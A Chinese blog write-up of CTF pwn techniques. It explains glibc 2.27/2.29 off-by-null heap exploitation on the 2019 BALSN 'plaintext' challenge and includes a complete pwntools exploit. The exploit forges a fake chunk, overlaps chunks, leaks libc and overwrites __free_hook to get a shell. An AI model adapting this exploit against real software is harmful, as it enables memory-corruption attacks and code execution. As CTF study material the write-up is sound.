【八芒星计划】 OFF BY NULL

最新推荐文章于 2024-03-16 19:26:53 发布
最新推荐文章于 2024-03-16 19:26:53 发布
阅读量968 收藏 3
点赞数
分类专栏: CTF PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/carol2358/article/details/108327841
版权
CTF 同时被 2 个专栏收录
27 篇文章 3 订阅
订阅专栏
PWN
24 篇文章 1 订阅
订阅专栏

八芒星计划是我为了加深自己对于pwn各种题型的理解发起的,我会将平时遇到的题型相似的题目放在同一篇文章里,方便自己和他人查阅,同时也可能会录制相关的视频,来加深自己的映像,并且把知识点更细致地讲述给大家。
这一篇全部记录off by null

文章目录

2.27的off by null

在这里插入图片描述
①:free chunk0
②后面伪造好过后向合并的检测
③off by null chunk2
④通过chunk2的prevsize找到chunk0
⑤free chunk2 完成堆块复用

2019-BALSN-CTF-plaintext

【2.29的off by null,借助large bin的会留下指向自己的指针的特性,来伪造fake chunk,达成off by null】
本题进行过魔改,去除了一开始杂乱的bin和沙盒,所以orw的部分将不在本篇介绍,orw我也会专门开一篇来讲
但本题off by null的部分仍和原题一样
首先,我们要先学习一下2.29的off by null新增的机制
2.29在向低地址合并时,添加了一个检测,再加上原有的unlink检测

/* consolidate backward */
if (!prev_inuse(p)) {
    prevsize = prev_size (p);
    size += prevsize;
    p = chunk_at_offset(p, -((long) prevsize));
    if (__glibc_unlikely (chunksize(p) != prevsize))
        malloc_printerr ("corrupted size vs. prev_size while consolidating");
    unlink_chunk (av, p);
}

拿出来就是两个检测点
检测点1:

if (__glibc_unlikely (chunksize(p) != prevsize))
    malloc_printerr ("corrupted size vs. prev_size while consolidating");

此举将会检测chunksize§是否等于prevsize,这个p是前面的chunk,而prevsize是属于当前的chunk的

检测点2:

if (__builtin_expect (FD->bk != P || BK->fd != P, 0))
    malloc_printerr (check_action, "corrupted double-linked list", P, AV);

此举将会检测p(前面的chunk,也就是要被合并的chunk)的fd的bk, bk的fd是否指向p

题目思路:
在这里插入图片描述

①填充heap,并且申请7个0x28来应对tcache,使得heap的地址达到第二字节为0,也就是直接观察到的heap地址的倒数3,4位都是00,此举是为了应对后面我们填充数据时off by null破坏我们的数据,

在这里插入图片描述

②申请一个大chunk,再申请一个0x18防止合并,free大chunk,,然后申请一个巨大的chunk,来把我们free的chunk放入large bin,让他的fd_nextsize和bk_nextsize有他自己的堆块地址,这将被用于我们的fake chunk,再申请一个0x28,伪造fake chunk,内部的数据后面会讲到,自己做的话到这一步可以先随便填点什么,这也是为什么要让第二字节的数据为0的原因

在这里插入图片描述

③让fake chunk的fd->bk=fake chunk,先申请4个chunk,后续会用到,先填充tcache,free两个堆块到fastbin,再申请一个大于fastbin的堆块,让fastbin里的两个chunk被放入small bin,再申请出来,同时修改bk内容,让他指向fake_chunk的地址

在这里插入图片描述

④fake chunk的bk->fd=fake chunk,先清理tcache,然后填充tcache,free一个堆块,再free我们伪造的chunk属于的那个chunk,申请回来,修改fd为fake chunk的地址,至此,检测2已被绕过

在这里插入图片描述

⑤清理,申请一个0x28,再申请一个准备用来off by null的chunk,再申请一个chunk来清除unsortbin,同时防止合并,free0x28,add填入数据,绕过prevsize!=chunksize,free25,off by null达成

在这里插入图片描述

⑥本题去除沙盒,后续泄漏libc_base,打free_hook即可

完整exp:

from pwn import *
from LibcSearcher import * 

local_file  = './note'
local_libc  = '/root/glibc-all-in-one/libs/2.29/libc-2.29.so'
remote_libc = '/root/glibc-all-in-one/libs/2.29/libc-2.29.so'
 
select = 0

if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('', )
    libc = ELF(remote_libc)

elf = ELF(local_file)

context.log_level = 'debug'
context.arch = elf.arch

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims 			:r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))
o_g_32 = [0x13e211, 0x13e212]
o_g = [0xe237f, 0xe2383, 0xe2386, 0x106ef8]
def debug(cmd=''):
     gdb.attach(r,cmd)
def menu(ch):
    sea('Choice: ', str(ch))
def add(size, content):
    menu(1)
    sea('size: ', str(size))
    sea('content: ', content)
def free(idx):
    menu(2)
    sea('idx: ', str(idx))
def show(idx):
    menu(3)
    sea('idx: ', str(idx))
for i in range(8):
    add(0x1000, 'a')# 0-7
add(0xe00-0x200, 'a')# 8
for i in range(7):
    add(0x28, 'a')# 9-15
#----------------------------------------fake_chunk----------------------------------------------------

add(0xbf0, 'a')#16
add(0x18, 'a')#17
free(16)

add(0x1000, 'a')#16 !   
add(0x28, p64(0)+p64(0x521)+p8(0xc0))#18

#----------------------------------------fd->bk-------------------------------------------------

add(0x28, 'a')#19
add(0x28, 'a')#20
add(0x28, 'a')#21
add(0x28, 'a')#22
for i in range(7):
    free(i+9)
free(19)
free(21)
for i in range(7):
    add(0x28, 'a')
add(0x400, 'a')#19 !
add(0x28, p64(0)+'\x40')#21

#---------------------------------------bk->fd-------------------------------------------------
add(0x28, 'a')#23 clear
for i in range(7):
    free(i+9)
free(20)
free(18)
for i in range(7):
    add(0x28, 'a')
add(0x28, '\x40')#18
#--------------------------------------off by null---------------------------------------------
add(0x28, 'a')# 20 clear
add(0x28, 'a')#24
add(0x5f8, 'a')#25
add(0xc0, 'a')#26
free(24)
add(0x28, 'a'*0x20+p64(0x520))#24
free(25)
#-------------------------------------------libc----------------------------------
add(0x40, 'a')
show(20)
libc_base = uu64(ru('\x7f')[-6:]) - libc.sym['__malloc_hook'] - 0x10 - 96
info('libc_base', libc_base)
free_hook = libc_base + libc.sym['__free_hook']
og = libc_base + o_g[1]
free(22)
free(21)
add(0x40, p64(0)*5+p64(0x31)+p64(free_hook))
add(0x28, 'a')
add(0x28, p64(og))
r.interactive()

资料来源:

https://bbs.pediy.com/thread-257901.htm
https://www.anquanke.com/post/id/208407#h3-21
https://www.anquanke.com/post/id/189015#h3-10

真岛忍
关注
专栏目录
【Altium Designer】Off grid pin解决方法
夜半少年的博客
04-20 5319
​今天我画完原理图编译时,出现了太多的黄色(出现warning警告提示)Off grid pin警告,这个警告并不是原理图电气连接出问题了,而是元器件或器件PIN脚没有和栅格对齐造成的原因。再编译还是出现这个警告。 最后经过不断翻阅网上经验和实践,才最终解决,本经验详细记录了解决该警告的有效方法。 解决方案:以下是问题解决步骤... ​
学习打卡2:off-by-null
一点涵的博客
09-08 858
督促自己:2020-9-8 学习笔记: 《逆向工程权威指南上》12: 指令集架构:x86指令集架构(ISA),opcode长度不同;ARM指令集架构(精简指令集RISC),opcode相同,机器码都封装在4个字节里面(ARM模式),或封装在2个字节里面(Thumb模式) x/86: 函数返回值在eax中 使用“栈”结构存储上述返回地址 ARM: 使用LR寄存器存储函数结束的返回地址 BX LR 指令的作用就是跳转到返回地址 MIPS: 寄存器命名方式有两种:数字命名($0 ~ 31)和伪名称命名(
off by null 小结
qq_43409582的博客
11-20 3396
off by null 的一点心得 0x00 最近的一个比赛里有道off by null的题目,比较简单,这里写一下这题的wp和off by null的一些利用。 0x01 前置知识 off by null 本质上就是由于长度的检查不严谨导致了一个空字节的溢出造成的,通常我们会用它来构造Heap Overlap或是用来触发unlink。 这些的前提是对于堆块的合并有所了解。 向前合并与向后合并 先说向前合并,这里就不贴源码了。 通俗的说向前合并就是当一个chunk被free时去检查其物理相邻后一个chunk
tcache-off-by-null-LCTF2018_easy_heap
csdn546229768的博客
02-09 579
保护 分析 main: malloc: free: puts: 这题的保护措施做的很好,常见的free函数也没问题,但是这题有个off-by-null的漏洞,因为这题的限制条件较多所以考虑用堆重叠(overlapping heap chunk),然后就可以进行对重叠的chunk进行double free写入one_gadget到free_hook进行getshell 因为这题写入content时限制了\x00字符,那么在写入字节流时就会断掉写入 首先构造unsortbin进行合并的prev_siz
glibc2.29+的off by null利用
l512689096的博客
10-21 1876
本文首发自跳跳糖(http://tttang.com/archive/1614/)本文介绍了off by null的爆破法和直接法两类做法,并基于已有的高版本off by null的利用技巧做了一点改进,提出一种无特殊限制条件的直接法,更具有普适性。
高版本libc下的off by null
weixin_45209963的博客
09-08 1890
新版额外检查这个chunk size与被free掉的chunk的prev size是否相等,chunk overlap必须要伪造后者,而前者不可控,故一般打法失效。,通过大循环将这三个chunk全部放入同一个large bins。此时由于large bins机制,中间大小的chunk的。均相同,分别指向比自己小/大的chunk,将该chunk取下,同时伪造好。),残留指针为头节点libc指针,此时需要申请到该chunk,再申请一个。的size,再将该chunk的bk取下并写其fd为该chunk(伪造。
堆溢出 Off-By-One 原理学习
prettyX的博客
04-11 2269
Off-By-One 严格来说,off-by-one是一种特殊的溢出漏洞,off-by-one指程序向缓冲区中写入时,写入的字节数超过了这个缓冲区本身所申请的字节数并且只越界了一个字节。 off-by-one,是指单字节缓冲区溢出,这种漏洞的产生往往与边界验证不严和字符串操作有关,也不排除写入的size正好就只多了一个字节的情况。 一般认为,单字节溢出是难以利用的,但是因为Linux的堆管理机制ptmalloc验证的松散性,基于Linux堆的off-by-one漏洞利用起来并不复杂,并且威力强大...
WPF 的 Application.Current.Dispatcher 中,为什么 Current 可能为 null
walterlv - 吕毅
10-28 2572
在 WPF 程序中,可能会存在 Application.Current.Dispatcher.Xxx 这样的代码让一部分逻辑回到主 UI 线程。因为发现在调用这句代码的时候出现了 NullReferenceException,于是就有三位小伙伴告诉我说 Current 和 Dispatcher 属性都可能为 null。 然而实际上这里只可能 Current 为 null 而此上下文的 Dispat...
SqlServer_查询带有null的记录
icecoola_的博客
06-08 8211
字段的三种不同状态 select distinct region from f_agent (NULL) MMQ ZLQ 不同状态的记录数 select count(1) from f_agent 35709 select count(1) from f_agent where region = 'MMQ' 17579 MMQ select count(1) from f_age...
glibc2.31 off-by-null orw 攻击手法刨析
qq_39948058的博客
08-26 903
前言:复习一下glibc2.31版本的orw手法,largebin的残留信息进行unlik,随便弄个题来写的刨析,嘿嘿, 仅large bin chunk的堆块伪造,并即可实现堆块重叠 并large bin attack 任意写攻击TLS结构体中的存放tcache结构体指针的位置,从而可以伪造tcache bin结构体进行任意构造 再通过上述demo任意写控制参数,从而在assert后即可进行栈迁移 glibc2.31 off-by-null orw 攻击手法刨析 Free(3) 3---->un
高版本libc_off_by_null(一看就懂)
最新发布
qq_41683953的博客
03-16 1935
在libc2.29之后新增保护,区别与普通的off_by_null会判断pre_size和要合并的chunk_size是否相同普通的off_by_null只需要修改pre_inuse和pre_size即可完成重叠但是现在需要修改前一个的chunk_size这个显然不可能,那就只能自己伪造chunk。
unsigned long long 溢出 乘_二进制安全之堆溢出(系列)—— off by null
weixin_39813009的博客
11-30 82
本文是二进制安全之堆溢出系列的第七章节,主要介绍off by null。原理思路通过修改chunk的prev_inuse位,达到一个堆块重叠的作用流程修改下一个堆块B的size的最后一字节为0,即prev_inuse置0,size随之减小,逻辑上分为0×100的B1+0×20的B2在B2伪造一个chunk,其prev_inuse改为1,用以防止B和A发生前向合并,并在后面malloc fire时越...
攻防世界PWN之Babyheap(null off by one)题解
seaaseesa的博客
11-20 2176
Babyheap(null off by one) 本题用到的知识 malloc_hook、realloc_hook、fastbin attack、unsorted bin合并 首先,检查一下程序的保护机制,保护全开 然后用IDA分析,发现在创建并读入数据时,有一个null off by one漏洞 我们所能利用的也就是这个漏洞 第一步仍然是想办法泄露一些关键地址 由于可以溢...
【技术分享】实例剖析堆off_by_null漏洞
Innocence_0的博客
07-23 230
此时我们若在此处便写入shellcode,待后续我们劫持free_hook时,就可以无需写入libc中的system地址,而是直接填写shellcode的地址即可。(2)编辑刚刚所申请的0x30的chunk,将main_arena+88改为free_hook的地址,注意此处需要爆破半个字节。(5)控制tcache链上的fd指针,把main_arena+88的地址修改为free_hook的地址后,将其申请出来。chunk的大小是0x90,我就在此处申请一个0x30的chunk,以便对这片内存进行操作。
[堆入门off-by-null]asis2016_b00ks
Nashi_Ko的博客
12-02 1366
[BUUCTF] asis2016_b00ks 堆入门off-by-null 刚开始学pwn就听说,堆的题目很魔幻,需要大量的基础知识。在漫长地啃堆基础原理以后,这是我第一次自己研究学习并且完全明白原理的堆题。特地在此做笔记记录。 0x00 逆向分析 一进来就很容易发现,这也是堆题中最为常见的菜单题目。 简单分析一下,打开程序,最先产生交互的函数是sub_B6D。 调用了sub_9F5函数,是作者自己写的read函数,再进去看看。 注意这里的判定:先++buf,然后判断是否达到了最大长度(32字符),
how2heap glibc 2.27
qq_46441427的博客
10-10 756
fastbin dup 展示了glibc2.27里利用double free进行的fastbin attack #include <stdio.h> #include <stdlib.h> #include <assert.h> int main() { setbuf(stdout, NULL); printf("This file demonstrates a simple double-free attack with fastbins.\n"); pri
2019-BALSN-CTF-plaintext
m0_61948538的博客
03-16 467
libc-2.29的off-by-null
pwn中利用off by null的一个思路,构造假chunk的难以触及pre_size咋整
fzucaicai的博客
05-29 869
但是如果这个程序比较精明,把指针的free掉的时候清空了,这就需要好好利用这个off by null了,也就是利用这个off by null,去借助假的堆块把东西东西打出来,有时甚至能够double free(在2.27的glibc中直接double free的方法似乎已经不多见了,现在检查都很严格)。以上是unlink的源码,可以注意到,进行unlink操作的时候,构造假的fd,bk指针还不够呢,它还要去检查chunk的size和next_chunk的prev_size是否一致。
内核入口地址在哪修改_【linux内核userfaultfd使用】Balsn CTF 2019 KrazyNote(一)
weixin_39955355的博客
11-24 462
userfaltfd在内核漏洞利用中非常有用,借这道题来学习一下。一、背景知识1.提权内核提权一般需要利用漏洞来修改task_struct中的cred结构,commit_cred(prepare_kernel_creds(0))会帮你找到cred结构并修改。SMEP防止在内核态执行用户态代码,采用ROP来绕过;SMAP防止内核态使用用户态数据,切断了用户态的...
dev.off() null device 1
05-21
这是一个 R 语言的命令,它用于关闭设备并返回到默认的设备。在 R 语言中,图形设备是通过 `dev.xxx()` 命令打开和关闭的,其中 `xxx` 表示设备类型,如 `pdf`、`png`、`jpeg` 等。如果在绘图时使用了一个设备(如绘制了一个图形),那么需要使用 `dev.off()` 命令关闭该设备,以便在后续的绘图中使用默认设备或其他设备。在这里,输出 `null device 1` 表示成功关闭了设备。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值